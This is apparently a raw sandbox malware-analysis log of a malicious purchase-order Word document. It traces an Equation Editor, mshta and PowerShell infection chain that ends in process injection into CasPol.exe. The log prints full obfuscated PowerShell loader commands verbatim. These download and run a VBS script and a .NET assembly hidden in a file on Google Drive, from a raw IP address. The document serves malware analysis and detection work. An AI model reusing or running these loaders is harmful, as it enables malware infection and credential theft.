                  Source: CasPol.exe, CasPol.exe, 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: CasPol.exe, CasPol.exe, 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: PO NAHK22012FA00000.docx.docReversingLabs: Detection: 13%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8872.tmp" "c:\Users\user\AppData\Local\Temp\j0qjax5r\CSC3F30325724544FF3B51B1BF07A1EFBCB.TMP"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnKydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5yZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\yycdupifp"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\jsiovitzdbnf"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta" Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8872.tmp" "c:\Users\user\AppData\Local\Temp\j0qjax5r\CSC3F30325724544FF3B51B1BF07A1EFBCB.TMP"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnKydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5yZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\yycdupifp"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\jsiovitzdbnf"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
